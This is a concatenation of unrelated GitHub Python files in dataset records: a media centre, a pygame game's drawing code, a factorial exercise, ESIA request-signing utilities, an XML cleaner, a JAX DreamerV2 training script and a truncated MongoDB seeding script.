print(Gstr_synopsis)\n","repo_name":"thehanriver/pl-topo_covidnet","sub_path":"topo_covidnet/topo_covidnet.py","file_name":"topo_covidnet.py","file_ext":"py","file_size_in_byte":6930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7667026379","text":"#!/usr/bin/env python3\n#-\n# ## ###############################################\n#\n# MediaCenter.py\n# File main\n#\n# Autor: \n# License: MIT\n#\n# ## ###############################################\n\nimport tkinter as tk\nfrom tkinter import PhotoImage\nfrom PIL import Image,ImageTk\nfrom tkinter import filedialog as fd\nfrom tkinter import messagebox\nimport mediaLector as ml\nimport multiprocessing\n\ndef openFile():\n\t\"\"\"This function open files of type .bmp .png and .jpg\"\"\"\n\tfile = fd.askopenfilename(initialdir = os.getcwd(), title = 'Seleccione archivo', defaultextension = '*.*', filetypes = (('png files','*.png'),('jpg files','*.jpg'),('bmp files','*.bmp')))\n\t\ndef openDireactory():\n\t\"\"\"This function open a directory media\"\"\"\n\tdirectory = fd.askdirectory()\n\tprint('directory: ', directory)\n\tml.playMedia(directory)\n\t\ndef eventUSB(directory, play):\n\tprint('Abriendo multimedios...')\n\tif play:\n\t\tml.playUSB(directory)\n\t\ndef checkUSBconnection(var):\n\tplay = True\n\twhile True:\n\t\td={}\n\t\tfor l in open('/proc/mounts'):\n\t\t\tif(l[0] == '/'):\n\t\t\t\tl = l.split()\n\t\t\t\td[l[0]] = l[1]\n\t\t\t\n\t\tif('/dev/sdb1' in d):\n\t\t\teventUSB(d['/dev/sdb1'], play)\n\t\t\tplay = False\n","repo_name":"Alma-Vigueras/ProyectoFinalFSE","sub_path":"src/MediaCenter.py","file_name":"MediaCenter.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"10616592638","text":"#Lewis Mazzei - Fusion/Code/drawing.py\n#Note: If a comment is not on the same line then the corresponding comment to a line or chunk of code will be above it\n\n#import relevant packages\nimport pygame, pickle\n#colours file: stores colour values for each tile value\nfrom colours import tileColours\n#setup file: includes all functions needed for setting up pygame window and some constant variables needed throughout the process of running the game\nfrom setup import DISPLAY_WIDTH, DISPLAY_HEIGHT, display, clock, BLACK, WHITE, gridDictCoords, gridDictDimensions, elementSymbols\n\n#used for establishing font sizes (and boldness) for text elementSymbols throughout the game, both fonts are part of a folder containing several 'ubuntu' style fonts\ndef font(size, bold = True): \n\tif bold:\n\t\tfont = pygame.font.Font('/home/lewis/Documents/School/Fusion/External Files/ubuntu-font-family/Ubuntu-M.ttf', size) #ubuntu-M: bold font\n\telse:\n\t\tfont = pygame.font.Font('/home/lewis/Documents/School/Fusion/External Files/ubuntu-font-family/Ubuntu-R.ttf', size) #ubuntu-R: thinner non-bold font\n\n\treturn font\n\n#used for defining text's surface and the area around it\ndef createTextObjects(text, font, colour): \n\ttry:\n\t\ttextSurf = font.render(text, True, colour) #creates a surface for the text to sit on...\n\texcept TypeError: #the render function only takes in Unicode or bytecode, an empty string does not count as this and will through a typeError if this occurs\n\t\ttextSurf = font.render(None, True, colour) #in this case just pass in 'null' which is an acceptable value\n\treturn textSurf, textSurf.get_rect() #returns the surface and a rectangle that surrounds that surface\n\n#used for drawing button elementSymbols\ndef drawButton(outlineColour, outlineCoords, outlineWeight, text, font, textColour):\n\t#create box for button\n\tbuttonRect = pygame.draw.rect(display, outlineColour, outlineCoords, outlineWeight)\n\t#create the text surface and it's respective rectangle for positioning\n\tbuttonTextSurf, buttonTextRect = createTextObjects(text, font, textColour)\n\t#position text in the center of the button's box using the text surface's corresponding rectangle\n\tbuttonTextRect.center = ((outlineCoords[0] + (outlineCoords[2] / 2)), (outlineCoords[1] + (outlineCoords[3] / 2)))\n\t#draw button to display\n\tdisplay.blit(buttonTextSurf, buttonTextRect)\n\t\n\treturn buttonRect #returns the properties of the rectangle so that they can be referred to \n\n#used for drawing label elementSymbols\ndef drawLabel(text, font, colour, coords):\n\t#create the text surface and it's respective rectangle for positioning\n\tlabelTextSurf, labelTextRect = createTextObjects(text, font, colour)\n\t#position the label using the text surface's corresponding rectangle\n\tlabelTextRect.center = coords\n\t#draw button to display\n\tdisplay.blit(labelTextSurf, labelTextRect)\n\n\treturn labelTextRect #returns the properties of the rectangle so that they can be referred to \n\n#used for drawing input box elementSymbols (very similiar to a button but text is dynamic) \ndef drawInputBox(outlineColour, outlineCoords, outlineWeight, font, textColour, text = ''):\n\t#create box for input box\n\tinputBoxRect = pygame.draw.rect(display, outlineColour, outlineCoords, outlineWeight)\n\t#create the text surface and it's respective rectangle for positioning\n\tinputBoxTextSurf, inputBoxTextRect = createTextObjects(text, font, textColour)\n\t#position text in the center of the input box using the text surface's corresponding rectangle\n\tinputBoxTextRect.center = ((outlineCoords[0] + (outlineCoords[2] / 2)), (outlineCoords[1] + (outlineCoords[3] / 2)))\n\t#draw input box to display\n\tdisplay.blit(inputBoxTextSurf, inputBoxTextRect)\n\t\n\treturn inputBoxRect #returns the properties of the rectangle so that they can be referred to\n\n#used for drawing the header elements on the game screen\ndef drawGameScreenHeader(username, level, score, highscore):\n\tfeatureList = [drawLabel(username, font(25), BLACK, (100, 40)), #draw 'Username' label\n\t\t\t\t drawLabel(level, font(30), BLACK, ((DISPLAY_WIDTH / 2), 60)), #draw 'Level Number' label\n\t\t\t\t drawLabel(score, font(25), BLACK, (400, 40)), #draw 'Score' label\n\t\t\t\t drawLabel(highscore, font(25), BLACK, (400, 90)), #draw 'Highscore' label\n\t\t\t\t drawButton(BLACK, [50, 70, 120, 40], 3, 'Options', font(25), BLACK)] #draw 'Options' button\n\n\treturn featureList #returns the properties of the various elements on this screen to the loop function so that things such as button clicks can be listened for\n\n#used for drawing the game board grid on the game screen\ndef drawGameBoard():\n\tpygame.draw.rect(display, BLACK, [50, 150, 400, 400], 5) #draw the grid square\n\tfor yCoord in range(230, 550, 80):\n\t\tpygame.draw.line(display, BLACK, (50, yCoord), (450, yCoord), 3) #draw the horizontal grid lines\n\tfor xCoord in range(130, 450, 80):\n\t\tpygame.draw.line(display, BLACK, (xCoord, 150), (xCoord, 550), 3) #draw the vertical grid lines\n\t\n#used for drawing the tiles onto the game board grid\ndef drawTiles(gameboard):\n\tfor tile in gameboard.tiles: #for each tileon the board...\n\t\tlocation = gridDictCoords[tile.location] #...find the centre of the cell which it needs to be drawn onto...\n\t\tcolour = tileColours[gameboard.level - 1][(tile.element - 1) % 11] #...and select the appropriate colour for tile\n\n\t\tstartX = gridDictCoords[tile.location][0] - 37 #set the x...\n\t\tstartY = gridDictCoords[tile.location][1] - 37 #...and y coordinate for the top left pixel of the tile\n\t\twidth = gridDictDimensions[tile.location][0] #set the width...\n\t\theight = gridDictDimensions[tile.location][1] #...and height for the tile, depending on where the tile has to be drawn this will change due to the thickness of grid lines around it\n\n\t\ttileRect = pygame.draw.rect(display, colour, [startX, startY, width, height]) #draw the tile rectangle \n\t\tdrawLabel(str(elementSymbols[tile.element - 1]), font(25), BLACK, (gridDictCoords[tile.location][0], gridDictCoords[tile.location][1] - 15)) #draw the element name onto the tile\n\t\tdrawLabel(str(tile.element), font(25), BLACK, (gridDictCoords[tile.location][0], gridDictCoords[tile.location][1] + 20)) #draw the element number onto the tile\n\n#used for drawing the elements that make up the game screen whilst the 'gameLoop' is running\ndef drawGameScreen(gameboard):\n\tdisplay.fill(WHITE) #wipe screen before updating pixels\n\twith open('/home/lewis/Documents/School/Fusion/External Files/Leaderboard.pickle', 'rb') as file: #open leaderboard file\n\t\ttry: \n\t\t\tnamesAndScores = pickle.load(file) #get names and scores from 'leaderboard' file...\n\t\t\thighScore = namesAndScores[-1][1] #...and get the highscore from the list of names and scores\n\t\texcept EOFError: #unless the file is empty...\n\t\t\thighScore = 0 #...in which case just set the highscore to 0\n\t\tfeatures = drawGameScreenHeader(gameboard.username, 'LVL {}'.format(str(gameboard.level)), 'Score: {}'.format(str(gameboard.score)), 'Hi-Score: {}'.format(highScore)) #draw the header \n\tdrawGameBoard() #draw the board\n\tdrawTiles(gameboard) #draw the tiles\n\n\treturn features #return properties of all elements\n\n#used for drawing the elements that make up the main menu screen whilst the 'mainMenuLoop' is running\ndef drawMainMenuScreen():\n\tdisplay.fill(WHITE) #wipe screen before updating pixels\n\n\tdrawLabel('Fusion', font(140, True), (178, 34, 34), (DISPLAY_WIDTH / 2, 150)) #draw title screen header\n\n\tfeatureList = [drawButton(BLACK, [125, 320, 250, 50], 3, 'New Game', font(25), BLACK), #draw 'New Game' button\n\t\t\t\t drawButton(BLACK, [125, 380, 250, 50], 3, 'Load Game', font(25), BLACK), #draw 'Load Game' button\n\t\t\t\t drawButton(BLACK, [125, 440, 250, 50], 3, 'Leaderboard', font(25), BLACK), #draw 'Leaderboard' button\n\t\t\t\t drawButton(BLACK, [125, 500, 250, 50], 3, 'Instructions', font(25), BLACK)] #draw 'Instructions' button\n\n\treturn featureList #return properties of all elements\n\n#used for drawing the elements that make up the instructions screen whilst the 'instructionsLoop' is running\ndef drawInstructionsScreen():\n\tdisplay.fill(WHITE) #wipe screen before updating pixels\n\n\timg = pygame.image.load('/home/lewis/Documents/School/Fusion/External Files/Instructions Screen.png')\n\n\tdisplay.blit(img, (35,0))\n\n\tfeatureList = [drawButton(BLACK, [360, 5, 130, 35], 3, 'BACK', font(25), BLACK)]\n\n\treturn featureList #return properties of all elements\n\n#used for drawing the elements that make up the name input screen whilst the 'nameInputLoop' is running\ndef drawNameInputScreen(newGame, username):\n\tdisplay.fill(WHITE) #wipe the display before updating pixels\n\n\t#the only element that changes when drawing this screen is the text on the button used to submit the username and proceed to the game \n\tif newGame:\n\t\tfeatureList = [drawLabel('Please enter a username between 3 and', font(25), BLACK, (250, 235)), #draw prompt text\n\t\t\t\t\t drawLabel('8 characters long', font(25), BLACK, (250, 270)), #draw prompt text\n\t\t\t\t\t drawInputBox(BLACK, [150, 310, 200, 30], 2, font(25), BLACK, username), #draw input box\n\t\t\t\t\t drawButton(BLACK, [150, 365, 200, 30], 3, 'Start Game', font(25), BLACK), #draw 'Start Game' button\n\t\t\t\t\t drawButton(BLACK, [320, 35, 130, 35], 3, 'BACK', font(25), BLACK)] #draw 'Back' button\n\telse:\n\t\tfeatureList = [drawLabel('Please enter the username from your', font(25), BLACK, (250, 235)), #draw prompt text\n\t\t\t\t\t drawLabel('previous game.', font(25), BLACK, (250, 270)), #draw prompt text\n\t\t\t\t\t drawInputBox(BLACK, [150, 310, 200, 30], 2, font(25), BLACK, username), #draw input box\n\t\t\t\t\t drawButton(BLACK, [150, 365, 200, 30], 3, 'Continue Game', font(25), BLACK), #draw 'Continue Game' button\n\t\t\t\t\t drawButton(BLACK, [320, 35, 130, 35], 3, 'BACK', font(25), BLACK)] #draw 'Back' button\n\n\treturn featureList #return properties of all elements\n\n#draws the leaderboard grid that the leaderboard contents will populate\ndef drawLeaderboardGrid():\n\tpygame.draw.rect(display, BLACK, [50, 90, 400, 475], 5) #draw rectangle that leaderboard gird will be drawn in\n\t\n\tfor yCoord in range(565, 90, -43):\n\t\tpygame.draw.line(display, BLACK, (50, yCoord), (450, yCoord), 3) #draw horizontal grid lines\n\tpygame.draw.line(display, BLACK, (90, 90), (90, 565), 3) #draw the vertical line seperating the 'numbers' column and the 'username' column\n\tpygame.draw.line(display, BLACK, (270, 90), (270, 565), 3) #draw the vertical line seperating the 'username' column and the 'score' column\n\n#draws the contents that fill the leaderboard grid\ndef drawLeaderboardContents():\n\tdrawLabel('Username', font(25), BLACK, (175, 110)) #draw the column header for the 'username' column\n\tdrawLabel('Score', font(25), BLACK, (355, 110)) #draw the column header for the 'score' column\n\n\tnumCol = ['#', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10'] #the hash will be the column header for the 'numbers' column with the numbers themselves populating the rows of the column\n\trow = 1 #start at the first row\n\tfor yCoord in range(110, 545, 43):\n\t\tdrawLabel(numCol[row - 1], font(25), BLACK, (70, yCoord)) #for each row draw the corresponding number in the correct place on the grid\n\t\trow += 1 #incrememnt row\n\n\twith open('/home/lewis/Documents/School/Fusion/External Files/Leaderboard.pickle', 'rb') as file: #open the 'leaderboard' file\n\t\ttry: \n\t\t\tnamesAndScores = pickle.load(file) #load up the scores...\n\t\t\tnamesAndScores.reverse() #... and reverse the list so that the highest score is the first element\n\t\texcept EOFError: #unless there are no scores in the file...\n\t\t\tnamesAndScores = [] #...in which case, the list is just empty\n\tentry = 0\n\tfor yCoord in range(153, 545, 43): #for each row...\n\t\tif entry < len(namesAndScores): #...if there is still place on the table...\n\t\t\tdrawLabel(namesAndScores[entry][0], font(25, False), BLACK, (175, yCoord)) #...then draw the appropriate username onto the appropriate row and column...\n\t\t\tdrawLabel(str(namesAndScores[entry][1]), font(25, False), BLACK, (355, yCoord)) #...and the appropriate score onto the appropriate row and column\n\t\t\tentry += 1 #increment entry number\n\n#used for drawing the elements that make up the instructions screen whilst the 'leaderboardLoop' is running\ndef drawLeaderboardScreen():\n\tdisplay.fill(WHITE) #wipe screen before updating pixels\n\n\tdrawLeaderboardGrid() #draw the leaderboard grid\n\n\tfeatureList = [drawLabel('Leaderboard', font(40), BLACK, (155, 50)), #draw the leaderboard header \n\t\t\t\t drawButton(BLACK, [320, 35, 130, 35], 3, 'BACK', font(25), BLACK)] #draw the 'back' button\n\n\tdrawLeaderboardContents() #draw the contents of the leaderboard into the leaderboard grid\n\n\treturn featureList #return properties of all elements\n\n#used for drawing the elements that make up the options screen whilst the 'optionsLoop' is running\ndef drawOptionsScreen():\n\tdisplay.fill(WHITE) #wipe screen before updating pixels\n\n\tfeatureList = [drawLabel('Options', font(60), BLACK, (DISPLAY_WIDTH / 2, 85)), #draw the options header\n\t\t\t\t drawButton(BLACK, [160, 230, 190, 60], 3, 'LEADERBOARD', font(25), BLACK), #draw the 'leaderboard' button\n\t\t\t\t drawButton(BLACK, [160, 330, 190, 60], 3, 'MAIN MENU', font(25), BLACK), #draw the 'main menu' button\n\t\t\t\t drawButton(BLACK, [160, 430, 190, 60], 3, 'CONTINUE', font(25), BLACK)] #draw the 'continue' button\n\n\treturn featureList #return properties of all elements","repo_name":"lewismazzei/Fusion","sub_path":"Code/drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":13241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34817355029","text":"\"\"\"\nAccept a number and print the factorial of the same.\n\"\"\"\n\nuser_input = num = int(input('Enter a number: '))\n\nfact = 1\nwhile num >= 1:\n fact *= num # fact = fact * num\n num -= 1 # num = num - 1\n\nprint('factorial of', user_input, 'is', fact)\n\n# 5! + 4! + 3! + 2! =?\n","repo_name":"kayartaya-vinod/2020-AUG-ABB-PYTHON","sub_path":"Examples/ex04.py","file_name":"ex04.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41029006248","text":"import base64\nimport datetime\nimport json\nimport os\nimport tempfile\n\nimport pytz\n\nimport requests\n\nfrom .exceptions import CryptoBackendError, HttpError, IncorrectJsonError\n\n\ndef make_request(url, method='GET', headers=None, data=None, verify=True):\n \"\"\"\n Выполняет запрос по заданному URL и возвращает dict на основе JSON-ответа\n\n :param str url: URL-адрес\n :param str method: (optional) HTTP-метод запроса, по умолчанию GET\n :param dict headers: (optional) массив HTTP-заголовков, по умолчанию None\n :param dict data: (optional) массив данных передаваемых в запросе,\n по умолчанию None\n :param boolean verify: optional, производить ли верификацию\n ssl-сертификата при запросае\n :return: dict на основе JSON-ответа\n :rtype: dict\n :raises HttpError: если выбрасыватеся исключение requests.HTTPError\n :raises IncorrectJsonError: если JSON-ответ не может быть\n корректно прочитан\n \"\"\"\n try:\n response = requests.request(\n method, url, headers=headers, data=data, verify=verify)\n response.raise_for_status()\n return json.loads(response.content)\n except requests.HTTPError as e:\n raise HttpError(e)\n except ValueError as e:\n raise IncorrectJsonError(e)\n\n\ndef smime_sign(certificate_file, private_key_file, data, backend='m2crypto'):\n \"\"\"\n Подписывает данные в формате SMIME с использование sha256.\n В качестве бэкенда используется либо вызов openssl, либо\n библиотека M2Crypto\n\n :param str certificate_file: путь к сертификату\n :param str private_key_file: путь к приватному ключу\n :param str data: подписываемые данные\n :param str backend: (optional) бэкенд, используемый\n для подписи (m2crypto|openssl)\n :raises CryptoBackendError: если неверно указан backend\n :return: ��ткрепленная подпись\n :rtype: str\n \"\"\"\n if backend == 'm2crypto' or backend is None:\n from M2Crypto import SMIME, BIO\n\n if not isinstance(data, bytes):\n data = bytes(data)\n\n signer = SMIME.SMIME()\n signer.load_key(private_key_file, certificate_file)\n p7 = signer.sign(\n BIO.MemoryBuffer(data), flags=SMIME.PKCS7_DETACHED, algo='sha256')\n signed_message = BIO.MemoryBuffer()\n p7.write_der(signed_message)\n return signed_message.read()\n elif backend == 'openssl':\n source_file = tempfile.NamedTemporaryFile(mode='w', delete=False)\n source_file.write(data)\n source_file.close()\n source_path = source_file.name\n\n destination_file = tempfile.NamedTemporaryFile(mode='wb', delete=False)\n destination_file.close()\n destination_path = destination_file.name\n\n cmd = (\n 'openssl smime -sign -md sha256 -in {f_in} -signer {cert} -inkey '\n '{key} -out {f_out} -outform DER')\n os.system(cmd.format(\n f_in=source_path,\n cert=certificate_file,\n key=private_key_file,\n f_out=destination_path,\n ))\n\n signed_message = open(destination_path, 'rb').read()\n os.unlink(source_path)\n os.unlink(destination_path)\n return signed_message\n else:\n raise CryptoBackendError(\n 'Unknown cryptography backend. Use openssl or m2crypto value.')\n\n\ndef csp_sign(thumbprint, password, data):\n \"\"\"\n Подписывает данные с использованием ГОСТ Р 34.10-2012 открепленной подписи.\n В качестве бэкенда используется утилита cryptcp из ПО КриптоПРО CSP.\n\n :param str thumbprint: SHA1 отпечаток сертификата, связанного\n с зкарытым ключем\n :param str password: пароль для контейнера закрытого ключа\n :param str data: подписываемые данные\n \"\"\"\n tmp_dir = tempfile.gettempdir()\n source_file = tempfile.NamedTemporaryFile(\n mode='w', delete=False, dir=tmp_dir)\n source_file.write(data)\n source_file.close()\n source_path = source_file.name\n destination_path = source_path + '.sgn'\n\n cmd = (\n \"cryptcp -signf -norev -dir {tmp_dir} -der -strict -cert -detached \"\n \"-thumbprint {thumbprint} -pin '{password}' {f_in} 2>&1 >/dev/null\")\n os.system(cmd.format(\n tmp_dir=tmp_dir,\n thumbprint=thumbprint,\n password=password,\n f_in=source_path\n ))\n\n signed_message = open(destination_path, 'rb').read()\n os.unlink(source_path)\n os.unlink(destination_path)\n return signed_message\n\n\ndef sign_params(params, settings, backend='csp'):\n \"\"\"\n Подписывает параметры запроса и добавляет в params ключ client_secret.\n Подпись основывается на полях: `scope`, `timestamp`, `client_id`, `state`.\n\n :param dict params: параметры запроса\n :param EsiaSettings settings: настройки модуля ЕСИА\n :param str backend: (optional) бэкенд используемый\n для подписи (m2crypto|openssl|csp)\n :raises CryptoBackendError: если неверно указан backend\n :return: подписанные параметры запроса\n :rtype: dict\n \"\"\"\n plaintext = params.get('scope', '') + params.get('timestamp', '') + \\\n params.get('client_id', '') + params.get('state', '')\n if backend == 'csp':\n raw_client_secret = csp_sign(\n settings.csp_cert_thumbprint,\n settings.csp_container_pwd, plaintext)\n else:\n raw_client_secret = smime_sign(\n settings.certificate_file, settings.private_key_file,\n plaintext, backend)\n params.update(\n client_secret=base64.urlsafe_b64encode(\n raw_client_secret).decode('utf-8'),\n )\n return params\n\n\ndef get_timestamp():\n \"\"\"\n Возвращает текущую дату и время в строковом представлении с указанем зоны\n в формате пригодном для использования при взаимодействии с ЕСИА\n\n :return: текущая дата и время\n :rtype: str\n \"\"\"\n return datetime.datetime.now(pytz.utc).\\\n strftime('%Y.%m.%d %H:%M:%S %z').strip()\n","repo_name":"sokolovs/esia-oauth2","sub_path":"esia/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6865,"program_lang":"python","lang":"ru","doc_type":"code","stars":34,"dataset":"github-code","pt":"7"} +{"seq_id":"74117014623","text":"#!/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nOverwrite the original xml file with a middle of context line break replaced by a space.\nAlso expand the escaped characters, for example: £ becomes £\n\nLine breaks in text are generally represented as:\n \\r\\n - on a windows computer\n \\r - on an Apple computer\n \\n - on Linux\n\"\"\"\n\nimport re\nimport os\nimport sys\nfrom lxml import etree\n\n\ndef main():\n\n rootdir = \"../xml_files\"\n\n try:\n files = [f for f in os.listdir(rootdir) if os.path.isfile(os.path.join(rootdir, f))]\n except WindowsError:\n print(\"something is wrong\")\n sys.exit(1)\n\n for filename in files:\n filename = os.path.join(rootdir, filename)\n #print(filename)\n p = etree.XMLParser(resolve_entities=True)\n with open(filename, \"rt\") as f:\n tree = etree.parse(f, p)\n\n for node in tree.iter():\n if node.text is not None:\n if re.search(\"\\n|\\r|\\r\\n\", node.text.rstrip()):\n node.text = node.text.replace(\"\\r\\n\", \" \")\n node.text = node.text.replace(\"\\r\", \" \")\n node.text = node.text.replace(\"\\n\", \" \")\n\n # because encoding=\"UTF-8\" in below options, the output can contain non-ascii characters, e.g. £\n tree.write(filename, encoding=\"UTF-8\", xml_declaration=True)\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"jli755/python_scripts","sub_path":"clean_xml_and_newline.py","file_name":"clean_xml_and_newline.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"15844096386","text":"import jax as jx\nimport jax.numpy as jnp\nfrom jax import jit\nfrom jax.example_libraries import optimizers\nfrom jax.tree_util import register_pytree_node\n\nimport numpy as np\n\nimport json\nimport pickle as pkl\nimport argparse\nimport time\nfrom tqdm import tqdm\nimport os\n\nimport environments\nfrom initialization import get_init_fns\nfrom agent_environment_interaction_loop import get_agent_environment_interaction_loop_function\n\nimport wandb\n\nfrom types import SimpleNamespace\n\n# Tell JAX how to handle SimpleNamespace as a pytree (allows for more compact notation than dicts)\ndef SimpleNamespace_flatten(v):\n return (v.__dict__.values(), v.__dict__.keys())\n\ndef SimpleNamespace_unflatten(aux_data, children):\n return SimpleNamespace(**{k:v for k,v in zip(aux_data, children)})\n\nregister_pytree_node(SimpleNamespace, SimpleNamespace_flatten, SimpleNamespace_unflatten)\n\nactivation_dict = {\"relu\": jx.nn.relu, \"silu\": jx.nn.silu, \"elu\": jx.nn.elu}\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--seed\", \"-s\", type=int, default=0)\nparser.add_argument(\"--group\", \"-g\", type=str, default=None)\nparser.add_argument(\"--output\", \"-o\", type=str, default=\"dreamer.out\")\nparser.add_argument(\"--config\", \"-c\", type=str)\nparser.add_argument(\"--load_checkpoint\", type=str, default=None)\nparser.add_argument(\"--save_checkpoint\", type=str, default=\"checkpoint.pkl\")\nargs = parser.parse_args()\nkey = jx.random.PRNGKey(args.seed)\n\nwith open(args.config, 'r') as f:\n config=json.load(f)\nconfig.update({\"agent_type\":\"dreamerv2\", \"seed\":args.seed})\n\nconfig = SimpleNamespace(**config)\n\nassert(config.training_start_time>config.sequence_length)\n\n########################################################################\n# Define logging and checkpointing functions.\n########################################################################\n\ndef update_log_dict(d, u):\n if d is None:\n for k,v in u.items():\n if(jnp.ndim(v)==0):\n u[k] = jnp.expand_dims(v,axis=0)\n d = u\n else:\n for k,v in u.items():\n if(jnp.ndim(v)==0):\n v = jnp.expand_dims(v,axis=0)\n d[k]=jnp.concatenate([d[k],v])\n return d\n\ndef save_log(log_dicts, config):\n with open(args.output, 'wb') as f:\n data = log_dicts\n data[\"config\"]=config.__dict__\n pkl.dump(data, f)\n\ndef get_log_function(F):\n model_eval = jit(F.model_eval)\n\n def log(S, M, log_dicts, wallclock, key):\n curr_time = S.env_t\n\n # Log returns and associated times\n returns = M[\"return\"][M[\"episode_complete\"]]\n return_times = curr_time-config.eval_frequency+jnp.arange(config.eval_frequency)[M[\"episode_complete\"]]\n for ret, t in zip(returns, return_times):\n wandb.log({\"return\":np.array(ret),\"return_time\":np.array(t)})\n log_dicts[\"returns_and_times\"] = update_log_dict(log_dicts[\"returns_and_times\"],{\"return\":returns,\"return_time\":return_times})\n\n # Log model metrics\n key, subkey = jx.random.split(key)\n metrics = model_eval(S.buffer_state,S.model_opt_state,subkey)\n metrics[\"time\"] = curr_time\n metrics[\"time_per_step\"] = wallclock/config.eval_frequency\n wandb.log({key:np.array(value) for key, value in metrics.items()})\n log_dicts[\"metrics\"] = update_log_dict(log_dicts[\"metrics\"],metrics)\n return log_dicts\n return log\n\ndef save_checkpoint(run_state, log_dicts, i, wandb_id, opt_state_names):\n temp_filename = args.save_checkpoint+str(time.time())\n with open(temp_filename, 'wb') as f:\n unpacked_run_state = {}\n for k, v in run_state.__dict__.items():\n if k in opt_state_names:\n unpacked_run_state[k]=optimizers.unpack_optimizer_state(v)\n else:\n unpacked_run_state[k]=v\n pkl.dump({\n 'run_state':unpacked_run_state,\n 'log_dicts':log_dicts,\n 'i':i,\n 'wandb_id':wandb_id\n }, f)\n\n os.rename(temp_filename, args.save_checkpoint)\n\ndef load_checkpoint(opt_state_names):\n with open(args.load_checkpoint, 'rb') as f:\n checkpoint = pkl.load(f)\n run_state = checkpoint[\"run_state\"]\n for k in opt_state_names:\n run_state[k] = optimizers.pack_optimizer_state(run_state[k])\n run_state = SimpleNamespace(**run_state)\n log_dicts = checkpoint[\"log_dicts\"]\n start_i = checkpoint[\"i\"]+1\n wandb_id = checkpoint[\"wandb_id\"]\n return run_state, log_dicts, start_i, wandb_id\n\n########################################################################\n# Initialization\n########################################################################\n\nEnvironment = getattr(environments, config.environment)\nenv_config = config.env_config\n\nenv = Environment(**env_config)\nnum_actions = env.num_actions()\n\n# Initialize run_state and functions\ninit_state, init_functions = get_init_fns(env, config)\nkey, subkey = jx.random.split(key)\nrun_state = init_state(subkey)\nfunctions = init_functions()\nstart_i = 0\nlog_dicts = {\"returns_and_times\":None, \"metrics\":None}\n\nresumed = False\nopt_state_names = [\"V_opt_state\", \"pi_opt_state\", \"model_opt_state\"]\nif(args.load_checkpoint is not None):\n if(os.path.exists(args.load_checkpoint)):\n run_state, log_dicts, start_i, wandb_id = load_checkpoint(opt_state_names)\n resumed = True\n else:\n print(\"Warning! load_checkpoint does not exist, starting run from scratch.\")\n\n# Resume wandb session as well if loading from checkpoint\nif(resumed):\n wandb.init(config=config, resume=\"must\", id=wandb_id, project='dreamerv2_pure_jax', group=args.group)\nelse:\n wandb_id = wandb.util.generate_id()\n wandb.init(config=config, id=wandb_id, project='dreamerv2_pure_jax', group=args.group)\n\nlog = get_log_function(functions)\n\n# Build the agent environment interaction loop function\nagent_environment_interaction_loop_function = get_agent_environment_interaction_loop_function(functions, config.eval_frequency, config)\n\n# If the env itself is written in JAX we can compile the interaction loop\nif(config.jax_env):\n agent_environment_interaction_loop_function = jit(agent_environment_interaction_loop_function)\n\ntime_since_checkpoint = 0\nlast_time = time.time()\n\n########################################################################\n# Main training loop\n########################################################################\n\ni = start_i\ntqdm.write(\"Beginning run...\")\nfor i in tqdm(range(start_i,config.num_steps//config.eval_frequency), initial=start_i, total=config.num_steps//config.eval_frequency):\n run_state, metrics = agent_environment_interaction_loop_function(run_state)\n\n ellapsed_time = time.time()-last_time\n last_time = time.time()\n\n run_state.key, subkey = jx.random.split(run_state.key)\n log_dicts = log(run_state, metrics, log_dicts, ellapsed_time, subkey)\n\n # periodically save checkpoint to disk\n time_since_checkpoint+=config.eval_frequency\n if(time_since_checkpoint>=config.checkpoint_frequency):\n save_checkpoint(run_state, log_dicts, i, wandb_id, opt_state_names)\n time_since_checkpoint = 0\n\n# Save Data and final checkpoint\nsave_log(log_dicts, config)\nsave_checkpoint(run_state, log_dicts, i, wandb_id, opt_state_names)\nwandb.finish()\n","repo_name":"kenjyoung/dreamerv2_JAX","sub_path":"dreamer_single_seed.py","file_name":"dreamer_single_seed.py","file_ext":"py","file_size_in_byte":7283,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"7"} +{"seq_id":"41298135456","text":"from data.users import *\r\nfrom data.admins import *\r\nfrom data.locations import *\r\nfrom data.devices import *\r\nimport mongoengine\r\nimport random as r\r\nimport names\r\nimport csv\r\n\r\n\r\nmongoengine.register_connection(alias='core', name=\"test\")\r\n\r\n# ###################################################\r\n# #################### user data ####################\r\n# ###################################################\r\n\r\nfile = open(\"data.csv\")\r\ncsvreader = csv.reader(file)\r\nheader = next(csvreader)\r\nprint(header)\r\nrows = []\r\nfor row in csvreader:\r\n loc = Location()\r\n loc.lat = float(row[3])\r\n loc.lon = float(row[4])\r\n loc.address = row[2]\r\n loc.save()\r\n\r\n user = User()\r\n user.natId = row[0]\r\n user.firstName = names.get_first_name()\r\n user.lastName = names.get_last_name()\r\n user.email = row[1]+\"@yahoo.com\"\r\n ph_number = \"+\" + str(r.randint(6, 9))\r\n for i in range(1, 10):\r\n ph_number += str(r.randint(0, 9))\r\n user.phone = ph_number\r\n user.address = row[2]\r\n\r\n if r.randint(6, 9) % 2 == 0:\r\n user.testRes = True\r\n device = Device()\r\n device.ownerNatId = user.natId\r\n dId = \"\"\r\n for i in range(1, 10):\r\n dId += str(r.randint(0, 9))\r\n device.deviceId = dId\r\n device.save()\r\n user.deviceId =device.id\r\n else:\r\n user.testRes = False\r\n\r\n if r.randint(6, 9)%2 == 0:\r\n user.gender = \"male\"\r\n else:\r\n user.gender = \"female\"\r\n user.location = loc.id\r\n print(user)\r\n user.save()\r\nfile.close()\r\n\r\n\r\n\r\nuser2 = User()\r\nuser2.firstName = \"mohsen\"\r\nuser2.lastName = \"dh\"\r\nuser2.email = 